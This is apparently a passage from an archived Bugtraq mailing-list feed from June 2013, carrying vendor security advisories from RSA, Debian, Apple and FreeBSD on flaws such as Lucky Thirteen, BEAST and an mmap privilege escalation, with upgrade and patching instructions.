The Photos team has decided that an option to invalidate existing links is the ideal experience here. An engineer will begin building out the functionality shortly. Will keep you updated as time estimates solidify.

Thanks,

Alex
Security
Facebook

--------

--snip--
06/14/2013

Hi,

No that was separate, we have an engineer working on this fix but it is part of a larger rewrite so it is taking longer.

Thanks,

Emrakul
Security
Facebook
--------

&lt;/pre&gt;</description>
    <dc:creator>jjshoe&lt; at &gt;gmail.com</dc:creator>
    <dc:date>2013-06-19T14:45:38</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/52002">
    <title>Remote code execution in Puppet</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/52002</link>
    <description>&lt;pre&gt;http://puppetlabs.com/security/cve/cve-2013-3567/

&lt;/pre&gt;</description>
    <dc:creator>andreas.lindqvist&lt; at &gt;liu.se</dc:creator>
    <dc:date>2013-06-19T08:30:53</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/52001">
    <title>ESA-2013-032 RSA BSAFE® Micro Edition Suite Security Update for SSL/TLS Plaintext Recovery (aka “Lucky Thirteen”) Vulnerability</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/52001</link>
    <description>&lt;pre&gt;
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ESA-2013-032: RSA BSAFE® Micro Edition Suite Security Update for SSL/TLS Plaintext Recovery (aka Lucky Thirteen) Vulnerability


EMC Identifier: ESA-2013-032


CVE Identifier: CVE-2013-0169


Severity Rating: CVSS v2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)

 

Affected Products:

All versions of RSA BSAFE Micro Edition Suite except for 4.0.3 and 3.2.5

 

Unaffected Products:

RSA BSAFE Micro Edition Suite 4.0.3 and 3.2.5 (newly released)

 

Summary:  

RSA BSAFE Micro Edition Suite 4.0.3 and 3.2.5 contain updates designed to prevent SSL/TLS Plaintext Recovery (aka Lucky Thirteen) attacks (CVE-2013-0169).

 

Details:  

Researchers have discovered a weakness in the handling of CBC cipher suites in SSL, TLS and DTLS. The Lucky Thirteen attack exploits timing differences arising during MAC processing. Vulnerable implementations do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue.

 
Details of this attack can be found at: http://www.isg.rhul.ac.uk/tls/TLStiming.pdf
 


Recommendation:
 

RSA BSAFE Micro Edition Suite 4.0.3 and 3.2.5 contain a patch that is designed to help ensure that MAC checking is time invariant in servers. 

 

RSA recommends that customers on RSA BSAFE Micro Edition Suite 3.2.x or lower upgrade to RSA BSAFE Micro Edition Suite 3.2.5.   RSA recommends that customers on RSA BSAFE Micro Edition Suite 4.0.x upgrade to RSA BSAFE Micro Edition Suite 4.0.3. 

Customers can also protect against the attack by disabling CBC mode cipher suites on clients and servers. Cipher suites that use RC4 and, if TLS 1.2 is available, AES-GCM can be used. 



Obtaining Downloads

To request your upgrade of the software, please call your local support telephone number (contact phone numbers are available at http://www.rsa.com/node.aspx?id=1356 ) for most expedient service. You may also request your software upgrade online at http://www.rsa.com/go/form_ins.asp .



Obtaining Documentation:

To obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link.



Severity Rating:

For an explanation of Severity Ratings, refer to the Knowledge Base Article, Security Advisories Severity Rating at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.



Obtaining More Information:

For more information about RSA products, visit the RSA web site at http://www.rsa.com.



Getting Support and Service:

For customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help &amp;amp; Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab.



General Customer Support Information:

http://www.rsa.com/node.aspx?id=1264



RSA SecurCare Online:

https://knowledge.rsasecurity.com



EOPS Policy:

RSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details. 
http://www.rsa.com/node.aspx?id=2575 



SecurCare Online Security Advisories

RSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. RSA disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.



About RSA SecurCare Notes &amp;amp; Security Advisories Subscription

RSA SecurCare Notes &amp;amp; Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If you'd like to stop receiving RSA SecurCare Notes &amp;amp; Security Advisories, or if you'd like to change which RSA product family Notes &amp;amp; Security Advisories you currently receive, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the instructions on the page, remove the check mark next to the RSA product family whose Notes &amp;amp; Security Advisories you no longer want to receive. Click the Submit button to save your selection.



Sincerely,

RSA Customer Support

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (Cygwin)

iEYEARECAAYFAlHBw08ACgkQtjd2rKp+ALyHQACggG2us3gMSQQX4Ol0+Zxrqjvi
QAsAoLKL5rrl9BDb54SQ0i7K57mGy9S/
=JcQv
-----END PGP SIGNATURE-----
&lt;/pre&gt;</description>
    <dc:creator>Security Alert</dc:creator>
    <dc:date>2013-06-19T14:49:01</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/52000">
    <title>ESA-2013-039: RSA BSAFE® SSL-J Multiple Vulnerabilities</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/52000</link>
    <description>&lt;pre&gt;
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ESA-2013-039: RSA BSAFE® SSL-J Multiple Vulnerabilities


EMC Identifier: ESA-2013-039


CVE Identifier: CVE-2011-3389, CVE-2013-0169


Severity Rating: CVSS v2 Base Score: Refer to NVD (http://nvd.nist.gov/) for individual scores for each CVE

 

Affected Products:

All versions of RSA BSAFE SSL-J except for 6.0.1 and 5.1.2

 

Unaffected Products:

RSA BSAFE SSL-J 6.0.1 and 5.1.2 (newly released)

 

Summary:  

RSA BSAFE SSL-J 6.0.1 and 5.1.2 contain updates designed to prevent BEAST attacks (CVE-2011-3389) and SSL/TLS Plaintext Recovery (aka Lucky Thirteen) attacks (CVE-2013-0169).

 

Details:  

BEAST

There is a known vulnerability in SSLv3 and TLS v1.0 to do with how the Initialization Vector (IV) is generated. For symmetric key algorithms in CBC mode, the IV for the first record is generated using keys and secrets set during the SSL or TLS handshake. All subsequent records are encrypted using the ciphertext block from the previous record as the IV. With symmetric key encryption in CBC mode, plain text encrypted with the same IV and key generates the same cipher text, which is why having a variable IV is important.

The BEAST exploit uses this SSLv3 and TLS v1.0 vulnerability by allowing an attacker to observe the last ciphertext block, which is the IV, then replace this with an IV of their choice, inject some of their own plain text data, and when this new IV is used to encrypt the data, the attacker can guess the plain text data one byte at a time.


Lucky Thirteen

Researchers have discovered a weakness in the handling of CBC cipher suites in SSL, TLS and DTLS. The Lucky Thirteen attack exploits timing differences arising during MAC processing. Vulnerable implementations do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue.

 

Details of this attack can be found at: http://www.isg.rhul.ac.uk/tls/TLStiming.pdf
 


Recommendation:

 

RSA recommends that customers on RSA BSAFE SSL-J 5.1.x or lower upgrade to RSA BSAFE SSL-J 5.1.2. RSA recommends that customers on RSA BSAFE SSL-J 6.0 upgrade to RSA BSAFE SSL-J 6.0.1.

To address BEAST, RSA introduced a new feature called first block splitting to RSA BSAFE SSL-J 6.0.1 and 5.1.2. First block splitting is designed to prevent the BEAST exploit by introducing unknown data into the encryption scheme prior to the attacker's inserted plain text data. This is done as follows:

1. The first plain text block to be encrypted is split into two blocks. The first block contains the first byte of the data, the second block contains the rest.
2. A MAC is generated from the one byte of data, the MAC key, and an increasing counter. This MAC is included in the first block.
3. The one byte of data, along with the MAC, is encrypted and becomes the IV for the next block. Because the IV is now essentially random data, it is impossible for an attacker to predict it and replace it with one of their own.
For RSA BSAFE SSL-J 6.0.1 and 5.1.2, first block splitting is engineered to be enabled by default for vulnerable cipher suites, making the application secure by default. If required, the application can disable first block splitting by setting the system property jsse.enableCBCProtection:

 

 Using the following Java code:

  System.setProperty("jsse.enableCBCProtection", "false");

 

 OR

 

 On the Java command line, passing the following argument:

  -Djsse.enableCBCProtection=false

 

For more information about setting security properties, see section System and Security Properties in the RSA BSAFE SSL-J Developer Guide.

The best way to help prevent the BEAST attack is to use TLS v1.1 or higher. The vulnerability to do with IV generation was fixed in TLS v1.1 (released in 2006) so implementations using only TLS v1.1 or v1.2 are engineered to be secure against the BEAST exploit. However, support for these higher level protocols is limited to a smaller number of applications, so supporting only TLS v1.1 or v1.2 might cause interoperability issues.

A second solution is to limit the negotiated cipher suites to exclude those that do not require symmetric key algorithms in CBC mode. However, this substantially restricts the number of cipher suites that can be negotiated. That is, only cipher suites with NULL encryption or cipher suites with streaming encryption algorithms (the RC4 algorithm) could be negotiated, which might result in reduced security.

To address Lucky Thirteen, RSA BSAFE SSL-J 6.0.1 and 5.1.2 contain a patch that is designed to help ensure that MAC checking is time invariant in servers. 

Customers can also protect against the Lucky Thirteen attack by disabling CBC mode cipher suites on clients and servers. Cipher suites that use RC4 and, if TLS 1.2 is available, AES-GCM can be used.



Obtaining Downloads:

To request your upgrade of the software, please call your local support telephone number (contact phone numbers are available at http://www.rsa.com/node.aspx?id=1356 ) for most expedient service. You may also request your software upgrade online at http://www.rsa.com/go/form_ins.asp .



Obtaining Documentation:

To obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link.



Severity Rating:

For an explanation of Severity Ratings, refer to the Knowledge Base Article, Security Advisories Severity Rating at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with a particular security vulnerability.



Obtaining More Information:

For more information about RSA products, visit the RSA web site at http://www.rsa.com.



Getting Support and Service:

For customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help &amp;amp; Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab.



General Customer Support Information:

http://www.rsa.com/node.aspx?id=1264



RSA SecurCare Online:

https://knowledge.rsasecurity.com



EOPS Policy:

RSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details. 
http://www.rsa.com/node.aspx?id=2575 



SecurCare Online Security Advisories

RSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. RSA disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.



About RSA SecurCare Notes &amp;amp; Security Advisories Subscription

RSA SecurCare Notes &amp;amp; Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If you'd like to stop receiving RSA SecurCare Notes &amp;amp; Security Advisories, or if you'd like to change which RSA product family Notes &amp;amp; Security Advisories you currently receive, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the instructions on the page, remove the check mark next to the RSA product family whose Notes &amp;amp; Security Advisories you no longer want to receive. Click the Submit button to save your selection.



Sincerely,

RSA Customer Support

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (Cygwin)

iEYEARECAAYFAlHBwyMACgkQtjd2rKp+ALwI0gCbBNOxiDjCZzTl293lMa53Yy2r
pcsAn2UpV1x8Zg4031kyOrW5LfV2vner
=W+qW
-----END PGP SIGNATURE-----
&lt;/pre&gt;</description>
    <dc:creator>Security Alert</dc:creator>
    <dc:date>2013-06-19T14:50:14</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/51999">
    <title>ESA-2013-045: RSA BSAFE® SSL-C Security Update for SSL/TLS Plaintext Recovery (aka “Lucky Thirteen”) Vulnerability</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/51999</link>
    <description>&lt;pre&gt;
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

ESA-2013-045: RSA BSAFE® SSL-C Security Update for SSL/TLS Plaintext Recovery (aka Lucky Thirteen) Vulnerability


EMC Identifier: ESA-2013-045


CVE Identifier: CVE-2013-0169


Severity Rating: CVSS v2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)

 

Affected Products:

All versions of RSA BSAFE SSL-C except for 2.8.7

 

Unaffected Products:

RSA BSAFE SSL-C 2.8.7 (newly released)


Summary:  

RSA BSAFE SSL-C 2.8.7 contains updates designed to prevent SSL/TLS Plaintext Recovery (aka Lucky Thirteen) attacks (CVE-2013-0169).

 

Details:  

Researchers have discovered a weakness in the handling of CBC cipher suites in SSL, TLS and DTLS. The Lucky Thirteen attack exploits timing differences arising during MAC processing. Vulnerable implementations do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue.
 

Details of this attack can be found at: http://www.isg.rhul.ac.uk/tls/TLStiming.pdf
 


Recommendation:

RSA BSAFE SSL-C 2.8.7 contains a patch that is designed to help ensure that MAC checking is time invariant in servers. 

 
RSA recommends that customers on RSA BSAFE SSL-C 2.8.6 or lower upgrade to RSA BSAFE SSL-C 2.8.7.
 

Customers can also protect against the attack by disabling CBC mode cipher suites on clients and servers. Cipher suites that use RC4 and, if TLS 1.2 is available, AES-GCM can be used.



Obtaining Downloads

To request your upgrade of the software, please call your local support telephone number (contact phone numbers are available at http://www.rsa.com/node.aspx?id=1356 ) for most expedient service. You may also request your software upgrade online at http://www.rsa.com/go/form_ins.asp .




Obtaining Documentation:

To obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link.




Severity Rating:

For an explanation of Severity Ratings, refer to the Knowledge Base Article, Security Advisories Severity Rating at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with a particular security vulnerability.




Obtaining More Information:

For more information about RSA products, visit the RSA web site at http://www.rsa.com.



Getting Support and Service:

For customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help &amp;amp; Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab.



General Customer Support Information:

http://www.rsa.com/node.aspx?id=1264



RSA SecurCare Online:

https://knowledge.rsasecurity.com



EOPS Policy:

RSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details. 
http://www.rsa.com/node.aspx?id=2575 



SecurCare Online Security Advisories

RSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided "as is" without warranty of any kind. RSA disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.



About RSA SecurCare Notes &amp;amp; Security Advisories Subscription

RSA SecurCare Notes &amp;amp; Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If you'd like to stop receiving RSA SecurCare Notes &amp;amp; Security Advisories, or if you'd like to change which RSA product family Notes &amp;amp; Security Advisories you currently receive, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the instructions on the page, remove the check mark next to the RSA product family whose Notes &amp;amp; Security Advisories you no longer want to receive. Click the Submit button to save your selection.



Sincerely,

RSA Customer Support

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (Cygwin)

iEYEARECAAYFAlHBwwAACgkQtjd2rKp+ALzA8QCeKc//gfYNJwz8q+g7GtInPEgS
gIcAoI2ry3F2QWCjVbEC7w7Ll2jed3mo
=cTJ7
-----END PGP SIGNATURE-----
&lt;/pre&gt;</description>
    <dc:creator>Security Alert</dc:creator>
    <dc:date>2013-06-19T14:51:13</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/51998">
    <title>[SECURITY] [DSA 2628-2] nss-pam-ldapd update</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/51998</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2628-2                   security&amp;lt; at &amp;gt;debian.org
http://www.debian.org/security/                        Moritz Muehlenhoff
June 18, 2013                          http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : nss-pam-ldapd
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2013-0288

The security update DSA-2628 for nss-pam-ldapd failed to build on
kfreebsd-amd64 and kfreebsd-i386. 

For the oldstable distribution (squeeze) this problem has been fixed in
version 0.7.15+squeeze4.

We recommend that you upgrade your nss-pam-ldapd packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-announce&amp;lt; at &amp;gt;lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlHAuioACgkQXm3vHE4uylp1SgCfRfaE/82UPlw630fJJY2AiO9G
cQgAniRuJHY6scVJcCIszlq69vCLRwIv
=swiz
-----END PGP SIGNATURE-----


&lt;/pre&gt;</description>
    <dc:creator>Moritz Muehlenhoff</dc:creator>
    <dc:date>2013-06-18T19:52:40</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/51997">
    <title>[SECURITY] [DSA 2698-1] tiff security update</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/51997</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2698-1                   security&amp;lt; at &amp;gt;debian.org
http://www.debian.org/security/                           Michael Gilbert
June 18, 2013                          http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : tiff
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2013-1960 CVE-2013-1961
Debian Bug     : 706674 706675

Multiple issues were discovered in the TIFF tools, a set of utilities for
TIFF image file manipulation and conversion.

CVE-2013-1960

    Emmanuel Bouillon discovered a heap-based buffer overflow in the
    tp_process_jpeg_strip function in the tiff2pdf tool.  This could
    potentially lead to a crash or arbitrary code execution.

CVE-2013-1961

    Emmanuel Bouillon discovered many stack-based buffer overflows in
    the tiff tools.  These issues could potentially lead to a crash or
    arbitrary code execution.

For the oldstable distribution (squeeze), these problems have been fixed in
version 3.9.4-5+squeeze9.

For the stable distribution (wheezy), these problems have been fixed in
version 4.0.2-6+deb7u1.

For the testing distribution (jessie), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in
version 4.0.2-6+nmu1.

We recommend that you upgrade your tiff packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-announce&amp;lt; at &amp;gt;lists.debian.org




-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlHAtbAACgkQXm3vHE4uyloDOACgozJ0lFhXdu7Ef6NVI2OhKVzU
bdYAmweZ9zSg0QfyDtpcV7ncCvKSveaW
=mHsg
-----END PGP SIGNATURE-----


&lt;/pre&gt;</description>
    <dc:creator>Michael Gilbert</dc:creator>
    <dc:date>2013-06-18T19:39:25</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/51996">
    <title>APPLE-SA-2013-06-18-1 Java for OS X 2013-004 and Mac OS X v10.6 Update 16</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/51996</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

APPLE-SA-2013-06-18-1 Java for OS X 2013-004 and
Mac OS X v10.6 Update 16

Java for OS X 2013-004 and Mac OS X v10.6 Update 16 is now available
and addresses the following:

Java
Available for:  Mac OS X v10.6.8, Mac OS X Server v10.6.8,
OS X Lion v10.7 or later, OS X Lion Server v10.7 or later,
OS X Mountain Lion 10.8 or later
Impact:  Multiple vulnerabilities in Java 1.6.0_45
Description:  8011782  Multiple vulnerabilities existed in Java
1.6.0_45, the most serious of which may allow an untrusted Java
applet to execute arbitrary code outside the Java sandbox. Visiting a
web page containing a maliciously crafted untrusted Java applet may
lead to arbitrary code execution with the privileges of the current
user. These issues were addressed by updating to Java version
1.6.0_51. Further information is available via the Java website at
http://www.oracle.com/technetwork/java/javase/releasenotes-136954.html
CVE-ID
CVE-2013-1500
CVE-2013-1571
CVE-2013-2407
CVE-2013-2412
CVE-2013-2437
CVE-2013-2442
CVE-2013-2443
CVE-2013-2444
CVE-2013-2445
CVE-2013-2446
CVE-2013-2447
CVE-2013-2448
CVE-2013-2450
CVE-2013-2451
CVE-2013-2452
CVE-2013-2453
CVE-2013-2454
CVE-2013-2455
CVE-2013-2456
CVE-2013-2457
CVE-2013-2459
CVE-2013-2461
CVE-2013-2463
CVE-2013-2464
CVE-2013-2465
CVE-2013-2466
CVE-2013-2468
CVE-2013-2469
CVE-2013-2470
CVE-2013-2471
CVE-2013-2472
CVE-2013-2473
CVE-2013-3743
CVE-2013-2445


Java for OS X 2013-004 and Mac OS X v10.6 Update 16
may be obtained from the Software Update pane in System Preferences,
Mac App Store, or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/

For Mac OS X v10.6 systems
The download file is named: JavaForMacOSX10.6.Update16.dmg
Its SHA-1 digest is: a6b5a9caa3c0d9acf743da8e4c0e5cfe4e471b01

For OS X Lion and Mountain Lion systems
The download file is named: JavaForOSX2013-004.dmg
Its SHA-1 digest is: 153c3f74d5285d10008fce2004d904da8d2ffdff

Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
-----END PGP SIGNATURE-----


&lt;/pre&gt;</description>
    <dc:creator>Apple Product Security</dc:creator>
    <dc:date>2013-06-18T20:10:03</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/51995">
    <title>[SECURITY] [DSA 2710-1] xml-security-c security update</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/51995</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2710-1                   security&amp;lt; at &amp;gt;debian.org
http://www.debian.org/security/                      Salvatore Bonaccorso
June 18, 2013                          http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : xml-security-c
Vulnerability  : several
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2013-2153 CVE-2013-2154 CVE-2013-2155 CVE-2013-2156

James Forshaw from Context Information Security discovered several
vulnerabilities in xml-security-c, an implementation of the XML Digital
Security specification. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2013-2153

    The implementation of XML digital signatures in the Santuario-C++
    library is vulnerable to a spoofing issue allowing an attacker to
    reuse existing signatures with arbitrary content.

CVE-2013-2154

    A stack overflow, possibly leading to arbitrary code execution,
    exists in the processing of malformed XPointer expressions in the
    XML Signature Reference processing code.

CVE-2013-2155

    A bug in the processing of the output length of an HMAC-based XML
    Signature would cause a denial of service when processing specially
    chosen input.

CVE-2013-2156

    A heap overflow exists in the processing of the PrefixList attribute
    optionally used in conjunction with Exclusive Canonicalization,
    potentially allowing arbitrary code execution.

For the oldstable distribution (squeeze), these problems have been fixed in
version 1.5.1-3+squeeze2.

For the stable distribution (wheezy), these problems have been fixed in
version 1.6.1-5+deb7u1.

For the unstable distribution (sid), these problems have been fixed in
version 1.6.1-6.

We recommend that you upgrade your xml-security-c packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-announce&amp;lt; at &amp;gt;lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
-----END PGP SIGNATURE-----


&lt;/pre&gt;</description>
    <dc:creator>Salvatore Bonaccorso</dc:creator>
    <dc:date>2013-06-18T15:44:22</dc:date>
  </item>
  <item rdf:about="http://permalink.gmane.org/gmane.comp.security.bugtraq/51994">
    <title>FreeBSD Security Advisory FreeBSD-SA-13:06.mmap</title>
    <link>http://permalink.gmane.org/gmane.comp.security.bugtraq/51994</link>
    <description>&lt;pre&gt;-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=============================================================================
FreeBSD-SA-13:06.mmap                                       Security Advisory
                                                          The FreeBSD Project

Topic:          Privilege escalation via mmap

Category:       core
Module:         kernel
Announced:      2013-06-18
Credits:        Konstantin Belousov
                Alan Cox
Affects:        FreeBSD 9.0 and later
Corrected:      2013-06-18 09:04:19 UTC (stable/9, 9.1-STABLE)
                2013-06-18 09:05:51 UTC (releng/9.1, 9.1-RELEASE-p4)
CVE Name:       CVE-2013-2171

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit &amp;lt;URL:http://security.FreeBSD.org/&amp;gt;.

I.   Background

The FreeBSD virtual memory system allows files to be memory-mapped.
All or parts of a file can be made available to a process via its
address space.  The process can then access the file using memory
operations rather than filesystem I/O calls.

The ptrace(2) system call provides tracing and debugging facilities by
allowing one process (the tracing process) to watch and control
another (the traced process).

II.  Problem Description

Due to insufficient permission checks in the virtual memory system, a
tracing process (such as a debugger) may be able to modify portions of
the traced process's address space to which the traced process itself
does not have write access.

III. Impact

This error can be exploited to allow unauthorized modification of an
arbitrary file to which the attacker has read access, but not write
access.  Depending on the file and the nature of the modifications,
this can result in privilege escalation.

To exploit this vulnerability, an attacker must be able to run
arbitrary code with user privileges on the target system.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch http://security.FreeBSD.org/patches/SA-13:06/mmap.patch
# fetch http://security.FreeBSD.org/patches/SA-13:06/mmap.patch.asc
# gpg --verify mmap.patch.asc

b) Apply the patch.

# cd /usr/src
# patch &amp;lt; /path/to/patch

c) Recompile your kernel as described in
&amp;lt;URL:http://www.FreeBSD.org/handbook/kernelconfig.html&amp;gt; and reboot the
system.

3) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/9/                                                         r251902
releng/9.1/                                                       r251903
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing XXXXXX with the revision number, on a
machine with Subversion installed:

# svn diff -cXXXXXX --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing XXXXXX with the revision number:

&amp;lt;URL:http://svnweb.freebsd.org/base?view=revision&amp;amp;revision=XXXXXX&amp;gt;

VII. References

&amp;lt;other info on vulnerability&amp;gt;

&amp;lt;URL:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2171&amp;gt;

The latest revision of this advisory is available at
&amp;lt;URL:http://security.FreeBSD.org/advisories/FreeBSD-SA-13:06.mmap.asc&amp;gt;
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (FreeBSD)

iEYEARECAAYFAlHAB+YACgkQFdaIBMps37IjFACdFSoiYO1YkcPunLh7Zw4TC6MF
X9MAnjjVWB2uEl60Rl3K4WOuJ71AVNlP
=8309
